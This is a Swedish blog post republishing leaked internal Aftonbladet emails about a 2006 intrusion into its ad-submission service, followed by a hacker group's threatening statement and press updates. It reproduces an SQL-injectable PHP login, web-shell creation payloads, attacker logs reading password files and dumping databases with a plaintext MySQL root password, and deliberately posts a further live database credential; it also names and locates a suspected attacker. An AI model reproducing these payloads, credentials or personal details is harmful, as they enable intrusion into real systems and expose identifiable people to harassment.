Okej. VFH är tillbaka med ett nytt inlägg på flashback. Ett inlägg fullt med intern e-post från aftonbladet:

From: Ian Vännman ian.vannman@aftonbladet.se
Sender: “lg teknik” lg.teknik@aftonbladet.se
Subject: Re: [lg.teknik] transfer3 uppdatering…
Date: Wed, 21 Jun 2006 20:35:20 +0200
To: * “lg teknik” lg.teknik@aftonbladet.se

21 jun 2006 kl. 18.55 skrev Ian Vännman:

Hej!

Vi har nu rett ut hur intrånget gick till. Svagheterna i vår konfiguration var flera som ni kommer att se i beskrivningen:

Hackarna nyttjade inloggningsfunktionen på annonsmottagningstjänsten. Så här ser php-koden ut:

Om man inte väljer att köra addslashes på $user och
$password så måste man välja att slå på “magic quotes” i
php-konfigurationen. Om “magic quotes” är på så körs addslashes
funktionen på alla variabler som skickas in från formulär. Problemet
var att magic quotes inte var påslaget. Vi kan lägga ett stort ansvar
för den missen på Infomaker då vi tidigare fått rekommendationen att
slå av “magic quotes” av Dan Berghult på Infomaker när en funktion i
tjänsten inte fungerade som den skulle. Jag har kvar det mailet som han
skickade 17 maj i år. Förmildrande för Infomaker är att Anders Bjarby
hos dem, som utvecklat tjänsten, har arbetat mycket med oss för att
hitta intrångsvägen och även spårat upp en av de som sannolikt
genomförde intrånget. Jag lämnar det till Oscar att besluta om vi ska
polisanmäla hackarna, samt om vi ska föra en diskussion med Infomaker
om kompensation.

En annan svaghet som möjliggjorde intrånget var att användaren som
anslöt till mysql från annonstjänstens php-kod hade fulla rättigheter i
mysql och kunde därför skapa mysql-tabellen och dumpa ut den i en fil.

….

21 jun 2006 kl. 09.48 skrev Anders Bjarby:
Hej allihopa,

jag har lekt lite detektiv med de loggar som jag har fått ta del av och tolkar dom så här:
Initialt så var det ett par svenska killar som gav sig in på att testa lite out
of the box hackerlösningar på aftonbladet och lyckades med en sql
injection och skapade cmd2.php (på samma sätt och med samma filnamn som
jag hittade i ett kinesiskt forum). Dessa svenska killar spred sedan
uppgifterna på något slags forum eller via en irc-kanal vilket
resulterade i att ganska snart började det dyka upp såväl amerikanska,
kinesiska som tyska ip-nummer i loggen som alal anropar filen. Eftersom
det är en out of the box lösning och dom har använt sig avsamma filnamn
som i exemplet så får det mig att tro att dom är inga experter, deras
kommandon som dom sedan har skickat in är också ganska sporadiska. Vi
har lyckats identifiera två tidiga ip-nummer från logutdraget nedan:
84.55.93.136 och 213.113.27.69. Båda förekommer tidigt i det utdraget
och båda går till två svenska internetlevrantörer:

84.55.93.136 84-55-93-136.rev.sth.ownit.se
213.113.27.69 c-451b71d5.026-20-6b6c6d11.cust.bredbandsbolaget.se

Det sistnämnda ipnummret visade sig innehålla en webbsida, “orelevant”. En
googing på det visade att det dessutom fanns en registrerad domän på
den orelevant. Nic-se gav mig ett namn på innehavaren av den adressen:
“Andreas Rosander”. en googling på “orelevant” gav mig ett
antal träffar i olika linux, kernel och hackerforum samt ett
födelsedatum “orelevant” http://kerneltrap.org/user/orelevant och en epsotadress aftonbladetsucks@aftonbladet.se.
Birthday.se gav mig en ort(orelevant) på en Andreas Rosander född XXXX. Hitta.se gav mig en adress:
Andreas Rosander Tfn/fax: XXXX-XXXXXXX (Delas med (det är aftonbladet vi vill åt) Adress Orelevant. XX X XXXXX XXXXX
Eftersom Andreas verkar vara aktiv i olika linux, kernel, exploit forum så
tycker jag att det tyder på att han förmodligen inte har blivit hackad
själv utan tvärtom har ett litet intresse av den här typen av
aktiviteter och han förmodligen fått ta del av den här lösningen i
något forum (förmodligen en gansk aktiv kanal) och att han har testat
lite. Mitt förslag är att någon på aftonbladet juridiskt kunnig person
kontaktar Andreas, får hans knäna atts kaka och
tänder att skallra samt ber honom om information om var har har fått
tillgång till den här informationen och på vilket sätt han har nyttjat
den samt om han känner till om och hur och när andra har utnyttjat den.
På så sätt bör vi (om vi vill) kunna rotadjupare i det här ärendert och
kanske kunna komma åt själva källan. Men innan
vi gör något sådant ger jag er rådet att slå på magic_quotes i er
php.ini så att inga upprörda hackare får för sig att göra någonting värre

[* Allt jävla kinaprat och skit om att vi lagt upp information på nått tattarforum säger
ju en del om hur lite insikt de har. Döm själva. *]

20 jun 2006 kl. 16.00 skrev Ian Vännman:

Efter att vi plockade bort h4x.php filen så lyckades hackaren skapa den på nytt. Access-loggen visade ingenting:

209.242.5.54 - - [18/Jun/2006:21:07:45 +0200] “GET /h4x.php HTTP/1.1″ 404 291
209.242.5.54 - - [18/Jun/2006:21:08:17 +0200] “POST /index.php HTTP/1.1″ 200 212
209.242.5.54 - - [18/Jun/2006:21:10:25 +0200] “POST /index.php HTTP/1.1″ 200 78
209.242.5.54 - - [18/Jun/2006:21:10:57 +0200] “GET /h4x.php?cmd=id HTTP/1.1″ 200 101

21:07:45 fanns filen inte. 21:10:57 så var den på plats. Error loggen däremot:
[Sun Jun 18 21:07:45 2006] [error] [client 209.242.5.54] File does not exist: /Library/WebServer/Documents/annons/h4x.php
[Sun Jun 18 21:08:17 2006] [error] PHP Notice: Undefined variable: version in /Library/WebServer/Documents/annons/includes/prefs.php on line 2
[Sun Jun 18 21:08:17 2006] [error] PHP Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /Library/WebServer/Documents/annons/includes/functions.php on line 759
[Sun Jun 18 21:10:25 2006] [error] PHP Notice: Undefined variable: version in /Library/WebServer/Documents/annons/includes/prefs.php on line 2

21:07:45 fanns inte filen där. 21:08:17 så körs följande PHP kod som avslutas med en PHP-varning:
function doLogin($user,$password){ $query = “SELECT * FROM user WHERE userName=’$user’ AND password=’$password’”; $result = mysql_query($query) OR DIE(mysql_error()); $rows = mysql_NumRows($result); if($rows!=0){

Jag gissar att hackaren utnyttjar någon form av SQL injection svaghet i
variablerna user och/eller password som får antingen PHP eller MySQL
att urarta på ett sånt sätt att filen h4x.php skrivs till disk. Det
känns mer troligt att det är PHP, då filen skapas i PHPs rootmapp.

Den här texten känns mycket relevant:

http://www.sitepoint.com/article/php-security-blunders/2

Intressant är att den rekommenderade lösningen, att slå på magic quotes
rekommenderade Dan oss att slå av när Erika ville byta en språkvariabel.

/Ian

Fuck it. Eftersom det här ligger framme för alla att läsa räknar jag det nu som något alla bör ha tillgång till och postar även resten här.

Från: Anders Bjarby anders@infomaker.se
Datum: tisdag 20 jun 2006 11.31.01 GMT+02:00
Till: Alexander Green alexander.green@aftonbladet.se
Kopia: Erika Lindmark erika.lindmark@aftonbladet.se, Dan Berghult infomaker.se, Andy Olsson andy@infomaker.se
Ämne: Re: h4x

Hej,

nu har jag tittat lite på loggarna och googlat lite. Det visade sig att
nyckeln ligger i cmd2.php som är inkörsporten. cmd2.php verkar kunna
komma in på en del olika sätt ett är att en bugg i xml-rpc gör att om
man kör en eval() på vissa typer av xml kan gör att man kan skapa
php-filer på servern. Ett exempel är t.ex om man kör CMS-systemet
Drupal (http://secunia.com/advisories/15852/). Vad kör ni mer på servern än annonsmottagningen?
Ett annat sätt att skapa filen verkar vara genom att med hjälp av en sql-injection:

1. skapa en ny tabell i mysql
2. peta in php-kod i den nya mysql-tabellen
3. göra en mysql-selection till en extern fil (ny har vi en php-fil som går att köra)
4. gör en drop på tabellen så att spåren försvinner i mysql.

Jag hittade en liten instruktion på hur man gör det på en chinesisk site: http://www.cnxhacker.com/Article/show/378.html

Det här kan man lösa genom att dels verifiera att ingen php åker in i mysql
och att den användare sqom websysteme använder inte får dumpa data till
fil och inte får skapa nya tabeller. Att enbart se över mysqlanvändsarens rättigheter är en snabb fix.

/Anders

20 jun 2006 kl. 10.57 skrev Alexander Green:

transfer3:/Library/WebServer/Documents/annons root# cat /var/log/httpd/access_log | grep h4x
…
66.63.162.152 - - [18/Jun/2006:02:40:09 +0200] “GET /annons/cmd2.php?cmd=echo%20%22%3Cpre%3E%3C?%20system($_GE T['cmd']);%20?%3E%3C/pre%3E%22%3Eh4x.php HTTP/1.1″ 200 52
66.63.162.152 - - [18/Jun/2006:02:40:23 +0200] “GET /annons/h4x.php?cmd=id HTTP/1.1″ 200 5
66.63.162.152 - - [18/Jun/2006:02:41:14 +0200] “GET /annons/cmd2.php?cmd=rm%20h4x.php HTTP/1.1″ 200 52
66.63.162.152 - - [18/Jun/2006:02:46:48 +0200] “GET /annons/cmd2.php?cmd=echo%20%22%3Cpre%3E%3C%3F%20system(\\ $_GET['cmd']);%3F%3E%3C/pre%3E%22%3Eh4x.php HTTP/1.1″ 200 52
66.63.162.152 - - [18/Jun/2006:02:47:52 +0200] “GET /annons/h4x.php?cmd=rm%20cmd.php HTTP/1.1″ 200 24
66.63.162.152 - - [18/Jun/2006:02:47:59 +0200] “GET /annons/h4x.php?cmd=rm%20cmd2.php HTTP/1.1″ 200 24
85.10.240.250 - - [18/Jun/2006:03:08:50 +0200] “GET /annons/h4x.php?cmd=cat%20/private/etc/afpovertcp.cfg HTTP/1.1″ 200 539
85.10.240.250 - - [18/Jun/2006:03:09:10 +0200] “GET /annons/h4x.php?cmd=cat%20/etc/authorization HTTP/1.1″ 200 17509
85.10.240.250 - - [18/Jun/2006:03:11:12 +0200] “GET /annons/h4x.php?cmd=cat%20/private/etc/ftpusers HTTP/1.1″ 200 143
72.21.33.202 - - [18/Jun/2006:03:22:10 +0200] “GET /annons/h4x.php?cmd=ls%20/Network/Servers HTTP/1.1″ 200 49
72.21.33.202 - - [18/Jun/2006:03:22:34 +0200] “GET /annons/h4x.php?cmd=ls%20/Network/Servers/transfer3.aftonbladet.se/ HTTP/1.1″ 200 175
88.191.22.62 - - [18/Jun/2006:03:30:30 +0200] “GET /annons/h4x.php?cmd=ls%20/Users/admin/Sites HTTP/1.1″ 200 42
149.9.0.25 - - [18/Jun/2006:03:41:12 +0200] “GET /annons/h4x.php?cmd=ls%20-al%20../inpoc/admin HTTP/1.1″ 200 255
149.9.0.25 - - [18/Jun/2006:03:41:50 +0200] “GET /annons/h4x.php?cmd=cat%20../inpoc/admin/properties.txt HTTP/1.1″ 200 25
199.77.130.14 - - [18/Jun/2006:03:45:00 +0200] “GET /annons/h4x.php?cmd=cat%20/Library/WebServer/Documents/inpoc/admin/index.php HTTP/1.1″ 200 1887
199.77.130.14 - - [18/Jun/2006:03:46:09 +0200] “GET /annons/h4x.php?cmd=cat%20/Library/WebServer/Documents/inpoc/.htpasswd HTTP/1.1″ 200 44
88.191.12.200 - - [18/Jun/2006:03:47:51 +0200] “GET /annons/h4x.php?cmd=strings%20/private/etc/pure-ftpd/pureftpd.passwd HTTP/1.1″ 200 7639
193.219.28.245 - - [18/Jun/2006:03:52:18 +0200] “GET /annons/h4x.php?cmd=ls%20-la%20/Library/FTPServer/VirtualUsers/aftonbladet/ HTTP/1.1″ 200 207
193.219.28.245 - - [18/Jun/2006:03:53:01 +0200] “GET /annons/h4x.php?cmd=ls%20-la%20/Library/FTPServer/VirtualUsers/sport HTTP/1.1″ 200 279
….
transfer3:/Library/WebServer/Documents/annons root#
- ——————————————

Anders Bjarby

Infomaker Scandinavia AB

Box 347, SE-391 23 Kalmar, Sweden

Tel +46 480 36 20 05, Fax +46 480 887 25

anders@infomaker.se, www.infomaker.se

—

[* Vart fan får han xml-rpc idéerna ifrån? Senaste dödsbuggen på bugtraq eller vad? *]

Från: Anders Bjarby anders@infomaker.se
Datum: tisdag 20 jun 2006 19.46.27 GMT+02:00
Till: Ian Vännman ian.vannman@aftonbladet.se
Kopia: För många.

Japp,
om man har slagit av magic_quotes så har man ett säkerhetshål som
tillåter sql-injections. Slå omedelbart på den igen. Verifiera också
att den mysql-användare som körs via scriptet includes/dbConnect.php
inte får skapa tabeller, inte får skriva till fil.

Mvh Anders

—

From: Ian Vännman ian.vannman@aftonbladet.se
Sender: “* lg teknik” lg.teknik@aftonbladet.se
Subject: Re: [lg.teknik] SV: [lg.teknik] Fwd: [nattrapport] Dagrapport Tisdag den 20 Juni
Date: Thu, 22 Jun 2006 02:11:47 +0200
To: “* lg teknik” lg.teknik@aftonbladet.se

Följande tjänster är tillgängliga på yttre:

aftonbladet.se - länk till sajten.
anslagstavlan - internt köp och sälj.
bandbredd - direkt länk till IP-only, bör den ens finnas där?
blanketter - ladda hem blanketter.
boka - boka rum osv.
chatparade - antalet samtida chattare, fel lösen?
enkäten - internt enkät verkyg, vet ej om det används?
exchangemail - nerlagd tjänst.
hitparade - antalet besökare till aftonbladet, nerlagd 2005?
julklapp - tjänst där man väljer storlek på väst som man fick i år.
kalender_admin - adventkalender på galento-admin
kartor - länk till hitta.se
klicktoppen - fungerade länk till mest besökta länkarna på
aftonbladet.se, bör knappast finnas på yttre, då man lätt bokmärker
detta på hemdatorn, extremt känslig information!
landguiden - länk till landguiden.se
linkorama - död bokmärkeskatalog på galento
lämna bild - länk till tjänst på transfer3
lämna ljud - länk till http://kodar.aftonbladet.se/ som inte svarar, död?
lämna text - länk till tjänst på transfer3
mera rätt - länk till tjänsten mera rätt.
modempooler - länk till statisk sida om våra modempooler
motionera mera - länk till nerlagd projekttjänst
pepc - någon form av lämningstjänst för världsupplagan
pit - Samlingssida för www.aftonbladet.se övervakningssidor, funkar ej?
publicera på galento - kan man göra det från yttre?
resa - länk till www.ark.se
Rixlex - länk till http://www.riksdagen.se/debatt/
räckvidd - tjänst för att se ab och konkurrenters räckvidd, död?
shibsted aktiekurs - skönt felstavad tjänst som tur är nerlagd, med två användare?
stega på - nerlagd projekttjänst
Sverigekartan - länk till http://www.sna.se/webbatlas/700/, tjänsten suger jämfört med hitta.se
telegram - vår interna telegramtjänst
Tholin - länk med inloggning till tholin, enda användarna är ulla lundberg och fisken, död?
Upplysningscentralen - länk till http://www.uc.se/?
webbmail (säker) - länk till https://mail.aftonbladet.se
www statistik - samlingssida för aftonbladet.se statistik innehåller
länkar inklusive inloggning till extern extremt känslig information,
återigen kan bokmärkas på hemdatorer!

Några tjänster bör nog ryckas omedelbart pga de känsliga länkarna som
kan bokmärkas på datorer som vi inte äger. Andra kan nog strykas då de
är nerlagda.

Sista månaden har följande klickats på yttregalento:
webbmail (säker) - 1994 (bara en länk till mail.aftonbladet.se…)
meraratt - 450
lämna text - 393 (fast man kan göra samma sak direkt i scoop)
aftonbladet.se - 317
telegram - 211
motionera mera - 140 (trots att tjänsten är nerlagd?)
anslagstavlan - 69
lämna bild - 32
resa - 28
www statistik - 20
blanketter - 19
modempooler - 6

/Ian

21 jun 2006 kl. 12.37 skrev Anders Bjarby:

En till oroväckande tanke. eftersom mysqldumpen är på vift så innebär det
också att alla era kunder inlogg med tillhörande lösenord är på vift.
Det enda rimliga är att man automatgenererar nya lösenord och mailar ut
dessa till era kunder med automatik.

Mvh Anders

—

21 jun 2006 kl. 12.15 skrev Anders Bjarby:

Jag får en känsla av att filen hx4.php finns på flera ställen anrop sker ju
till både /annons/h4x.php och /h4x.php har ni sökt och rensat
ordentligt? det vorde också spännande att få ta sig en titt på exakt
vad dom innehåller. (både h4x.php och cmd2.php)

/Anders

–

21 jun 2006 kl. 11.56 skrev Anders Bjarby:

Nu har jag läst loggarna och det är ingen rolig läsning. Det har rört sig
om ganska mycket aktivitet och den del är direkt farlig och öppnar nya
hål:

här sker angreppet:
217.160.135.169 - - [18/Jun/2006:02:05:25 +0200] “POST /index.php HTTP/1.1″ 200 212

här skapas filen på nytt:
209.242.5.54 - - [18/Jun/2006:21:10:25 +0200] “POST /index.php HTTP/1.1″ 200 78

rootlösen för mysql på avvägar:
84.19.182.23 - - [18/Jun/2006:21:25:18 +0200] “GET /h4x.php?cmd=mysqlshow%20–user%20root%20–password=8ull3r6yn HTTP/1.1″ 200 62

alla databaser dumpade till fil:
195.169.149.213 - - [18/Jun/2006:21:28:02 +0200] “GET /h4x.php?cmd=mysqldump%20–all-databases%20–user%20root%20-p%208ull3r6yn%20%3E%20/tmp/.e HTTP/1.1″ 200 62
misslyckades med dump raderar och läser mysql–help
195.169.149.213 - - [18/Jun/2006:21:28:25 +0200] “GET /h4x.php?cmd=cat%20/tmp/.e HTTP/1.1″ 200 62
195.169.149.213 - - [18/Jun/2006:21:28:39 +0200] “GET /h4x.php?cmd=rm%20-f%20/tmp/.e HTTP/1.1″ 200 62
195.169.149.213 - - [18/Jun/2006:21:28:49 +0200] “GET /h4x.php?cmd=mysqldump%20–help HTTP/1.1″ 200 62

lyckades med mysqldump:
195.169.149.213 - - [18/Jun/2006:21:33:42 +0200] “GET /h4x.php?cmd=/usr/local/mysql/bin/mysqldump%20–all-databases%20–user=root%20–password=8ull3r6yn%20%3E/tmp/.e HTTP/1.1″ 200 62
195.169.149.213 - - [18/Jun/2006:21:36:35 +0200] “GET /h4x.php?cmd=cat%20/tmp/.e HTTP/1.1″ 200 3902808

Hämtar hem lösenordsfil för apache htaccess
199.77.130.14 - - [18/Jun/2006:03:46:09 +0200] “GET /annons/h4x.php?cmd=cat%20/Library/WebServer/Documents/inpoc/.htpasswd HTTP/1.1″ 200 44
plockar hem lösenordsfil för purftpd:
88.191.12.200 - - [18/Jun/2006:03:47:51 +0200] “GET /annons/h4x.php?cmd=strings%20/private/etc/pure-ftpd/pureftpd.passwd

rotar i appleshare:
88.191.12.200 - - [18/Jun/2006:03:53:20 +0200] “GET /annons/h4x.php?cmd=ls%20-la%20/Library/Filesystems/AppleShare/Authentication HTTP/1.1″ 200 127

mystiskt anrop: 213.92.92.22 - - [18/Jun/2006:03:53:24 +0200] “GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1″ 400 416

systemets lösenordsfil hämtas hem (förhoppningsvis är den shadowad):
84.55.93.136 - - [18/Jun/2006:10:07:27 +0200] “GET /annons/h4x.php?cmd=cat%20/etc/passwd HTTP/1.1″ 200 1885

Alltså:
- - rootlösen för mysql är på vift tillsammans med all data som fanns lagrad i mysql. Byt lösenord.
- - lösenordet för afp kan vara hackat
- - man har med stor sannolikhet bruteforcecrackat lösenorden till htaccess, pureftpd och även systemlösenord (om nu inte den filen var shadowad).

Alltså byt alla lösenord nu. När ni har gjort det se till att byta till det nya mysqllösenordet i filen includes/dbConnect.php

/Anders

Sedan bjuder VFH dessutom på login och lösenord till Aftonbladets annonssystem. Dessa tänker jag dock inte posta här men dom finns att läsa på flashbacks forum.

Lite kort om Infomaker/xlibris:
“XLibris Publisher är ett webbpubliceringssystem som troligen är det mest använda på tidningar i Sverige. Systemet är uppbyggt kring en kraftfull mediadatabas för texter, bilder, filer, länkar m m. Tillsammans med databasen byggs ett mallsystem för din webb upp. Mallarna kan liknas vid sidmallar för vanlig tidningsproduktion kompletterade med intelligens.”

Här har ni Infomakers lösenord (som kanske fungerar på annat håll, vem vet :

$db = mysql_pconnect(”localhost”,”xlibris”,”xRpm2000″);

Ni har några års loggar att gå igenom, hoppas ni får det skoj!

“Nu har jag läst loggarna och det är ingen rolig läsning.”
MOAUHGAUHHHAHAHA

Allt prat om att vi tog oss in via er internsida är bara skit. Det var där vi dumpade de
hashade lösenorden därför att den efterblivna algoritm som används där har sårbarheter.
Idioter.

Tills vidare. Aftonbladet: Ert mörkläggande av det här är fan pinsamt. Vi begär
att ni inom kort går ut med en vräkartikel på er hemsida och i er superfina
tidning där ni själva erkänner att det är NI som varit ignoranta och helt jävla
CHOCKDUMMA. Kan ni skriva om Kikki & Co och hur fel de beter sig, helt utan
empati, så nog fan är det dags att ni själva inser vad ni lyckats med. Ansvaret
ligger hos er. Hur fan kan ni vara så taffliga när det kommer till att hantera
denna typ av information?

Gå ut med sanningen nu eller så börjar vi publicera andra saker - som ni redan vet
så har vi tappat alla våra spärrar för moral för länge sedan, jävlas inte..

En kort notis:
Vi har ingen som helst koppling till AUH. Likheten av namnval valde vi utav
respekt för vad de står för och lyckats med. Vi hoppas att aktioner likt denna
gör att fler folk blir inspirerade till att hacka, så som vi blivit av AUH.

Och det kan även nämnas att:
En samling förbannade hackare som lyckats filura ut hur man kontaktar oss har
anslutit sig till VFH och kommer att hjälpa till med framtida uppdrag. Om du/ni
känner er manade samt besitter höga kunskaper inom datorer och jävulskap hoppas
vi mer än gärna att ni ansluter er till oss.

Mvh. Vuxna Förbannade Hackare

Som om detta inte vore nog så postade en person information gällande och root-lösenord till Ian Vännmans egen domän “vannman.com” på nätet. Den ligger nu nere.

Jobbig helg på jobbet, Ian?

Uppdatering: Dagens Media har skrivit en artikel gällande det hela. Aftonbladet kör på samma spår som tidigare och låtsas som om det inte är något speciellt som hänt:

- De påstår det på Flashback. Det är ingen större fara. I värsta fall kan någon obehörig gå in och lämna annonsmaterial. Men risken att inte Aftonbladet skulle upptäcka det är minimal.

Uppdatering 2: Nu har även IDG skrivit en artikel. Inte mycket att säga förutom att dom är skeptiska till att lösenorden faktiskt fungerar eftersom det inte dykt upp några skärmdumpar eller liknande:

Vid förra publiceringen var det ett flertal användare på forumet Flashback som testade inloggningsuppgifterna och publicerade skärmdumpar. Så har inte skett den här gången, varför lösenordens äkthet inte har verifierats. Om de stämmer är dock risken stor att flera använder lösenorden också på andra sajter och inloggningssystem, vilket i så fall genast bör ändras.

Så vad är detta då, IDG?

Uppdatering 3: IDG har ändrat sig. Skriver nu istället:

En skärmdump som postats verifierar detta.

Uppdatering 4: IDG har skrivit en till artikel om det som har hänt. Denna gången har dom en intervju med mr. Förnamn-som-lösenord himself, Olof Brundin, gällande det hela:

Hur ser ni på hotet som hackarna riktat mot er?
- Det har varit ganska lätt att konstatera att uppmärksamhet i form av din artikel och andras som de är ute efter. Det är klart att Aftonbladet inte kommer att ge efter för någon form av utpressning. Först gör vi vår utredning, sen får polisen göra sin och så får vi se vart det leder, säger Olof Brundin, informationsdirektör på Aftonbladet.

Någon kommentar till att många av era annnonskunders lösenord blivit publicerade?
- Vi ser på det på samma sätt som tidigare händelse. Detat är ett inbrott och och Flashback väljer att ge plats för det här och det är som det är. Vi kan inte göra annat än att fullfölja den utredning som vi startat, säger Olof Brundin.

Kommer ni att informera alla vars lösenord nu är på drift?
- Naturligtvis kommer alla de företag eller personer som berörs av det här inbrottet kommer att informeras på olika sätt.

Hackarna och många på Flashbacks forum menar att ni har mörkat det som hänt. Har ni det?
- Vi har skrivit om det så sent som i går. Vi har skrivit både på nätet och i papperstidningen. Vi måste rapportera om det som händer, även när det berör oss själva. Däremot vill vi inte gå in i enskildheter innan vi skaffat oss en egen bild av vad som hänt. Det sitter ett stort antal människor och arbetar med den här kartläggningen och vi vill ha en fullständig bild innan vi väljer att gå vidare med detta, säger Olof Brundin, informationsdirektör på Aftonbladet.

Får väl se vad som händer.

Uppdatering 5: En till skärmdump:

Uppdatering 6: Aftonbladet har stängt ner samtliga konton i sin annonstjänst och skickat ut det här mailet till samtliga kunder:

Från: Christofer (*@aftonbladet.se)
Skickat: den 5 januari 2008 17:50:05
Svara till: Christofer (*@aftonbladet.se)
Till: *

Viktig information!

Under dagen har det publicerats information på internet om ett intrång på Aftonbladets annonslämningssida. Denna tjänst används för att lämna annonsmaterial till print, alltså kvällstidningen Aftonbladet och morgontidningen Punkt SE. Den publicerade informationen innehöll inloggningsuppgifter till konton som ni har lämnat in annonser via.

Vi tar detta på största allvar och kommer därför att avsluta samtliga konton till denna tjänst.

Detta medför att ni kommer att behöva skapa ett nytt konto nästa gång ni ska lämna annonsmaterial, vilket ni gör direkt på annonslämningssidan.

Vi uppmanar er att välja ett nytt lösenord som ni använder endast för denna tjänst. Ni bör även se över om ni använt ert gamla lösenord på någon annan tjänst där den kan tänkas komma att missbrukas, såsom exempelvis Facebook, mejl eller MSN.

Återigen, vi tar detta på största allvar och beklagar det inträffade.

Ett förtydligande, allt annonsmaterial som kommer in till Aftonbladet kopplas ihop med en mottagen bokning med tillhörande bekräftelse och granskas före publicering.

För ytterligare frågor kring detta, vänligen kontakta ansvarig för Aftonbladets annonslämning: Christofer Poijes på telefon 08-725 27 53

För hjälp med att skapa nytt konto, kontakta Sandra Ramberg på telefon 08-725 25 87

Uppdatering 7: Kristofer har ringt och pratat med Expressen som valt att återigen inte publicera någonting gällande intrången hos aftonbladet. Enligt personen han pratat med beror det antagligen på något av följande:

1. Eftersom Expressen och Aftonbladet är så starka konkurrenter så skulle Expressens läsare bara tro att de smutskastar Aftonbladet. Jag försökte säga att det finns mycket starka källor som styrker det som hänt men det skulle tydligen inte spela någon roll för läsarna, de skulle tro att Expressen smutskastar Aftonbladet i alla fall, enligt kvällschefen.

2. Den här hackergruppen “Vuxna Förbannade Hackers” är ute efter uppmärksamhet och att ge dem den vore som att ge efter för deras krav, något man på Expressen inte ville bidra med. Då var det bättre att låta andra tidningar skriva om det enligt kvällschefen.

3. Det är lite känsligt att skriva om sånt här, speciellt innan Aftonbladets kunder själva fått informationen. Om de skulle läsa i Expressen att deras egna konton är hackade innan de vet om det själva så skulle inte det vara bra. Jag kan tänka mig att det vore en obehaglig känsla för dem men samtidigt måste ju någon informera, varför inte media?

Uppdatering 8: Aftonbladet har helt ändrat riktning och har nu bestämt sig för att samarbeta med terrorister och vika för utpressning. Se följande artikel:

En sammanslutning som kallar sig Vuxna Förbannade Hackare (VFH) gillar inte Aftonbladet.

Gruppen är extremt skickliga på datorer. Genom att ta sig in i Aftonbladets datasystem har de på punkt för punkt avslöjat svagheterna i våra system.

Så långt är det obehagligt för oss som arbetar på Aftonbladet och ett problem för oss som företag.

Den positiva sidan är att det för varje svaghet de avslöjar stärker vår säkerhet för framtiden.

Men helt säkra kommer datasystem aldrig att bli. Det är som lås på bilar. Den som är redo att begå brott kommer att kunna bryta sig in. Världens starkaste säkerhetssystem kring datorer omgärdar amerikanska försvarshögkvarteret Pentagon. Där tog sig hackare in så sent som i juni i fjol.

I går bevisade VFH att våra värsta farhågor var sanna: de har tagit sig långt in i våra system. I praktiken var materialet hackarna publicerade i går ett angrepp mot våra annonskunder. Det betyder att de är inne på domäner som ytterst rör Aftonbladets vd Carl Gyllfors och jag ska inte mer orda om det.

Men VFH:s nya uppgifter visar ytterligare en sak: De kan nu ha tillgång till information som är källskyddad enligt svensk grundlag. På ren svenska: journalisters kontakter med källor. Det är vårt allra heligaste.

I den stund Vuxna Förbannade Hackare skulle få för sig att sprida sådan information riktar sig deras attack inte längre mot Aftonbladet.

Då är det dig som medborgare VFH ger sig på. Din rätt att vara skyddad som källa om du vänder dig till en journalist för att få en orättvisa eller oförrätt granskad.

Varför gör Vuxna Förbannade Hackare detta? Låt oss lyssna på dem själva i sin programförklaring. Där skriver de:

”Folket måste göras påminda om att det media skiter ur sig och trycker på oss inte alltid är sanningen. Istället väljer man att köra på det som säljer och en jävla massa snyfthistorier och smutskastning av människor.”

Jag bläddrar i de senaste dagarnas tidningar som jag varit ansvarig utgivare för och försöker se vad som gjort VFH så förbannade.

Är det vårt avslöjande av biståndsskandalen i Tanzania?

Är det storyn om att några av Sveriges mest kända personer kommer att vittna i ett våldtäktsmål mot en svensk världsstjärna?

Är det vår ingående skildring av tragedin i Rödeby?

Vårt avslöjande att hemliga försvarsdokument legat och skräpat på ett bibliotek?

Är det de skakande bilderna på popikonen Britney Spears när hon förs i ambulans till psyket?

Vår förbehållslösa och översvallande glädje över Charlotte Kalla?

Jag är nytillträdd chefredaktör för Aftonbladet och på riktigt intresserad av vad i vår journalistik som gör Vuxna Förbannade Hackare så upprörda att de begår brott. Därför säger jag så här:

Kom och hälsa på mig på redaktionen söndag klockan 15.00, eller på måndag samma tid. Vi kan göra något så omodernt men mysigt som att dricka eftermiddagskaffe. Jag ska med spänning lyssna på er och förklara hur jag ser på saken.

Andra bloggar om: Aftonbladet, Vuxna Förbannade Hackare, Datorsäkerhet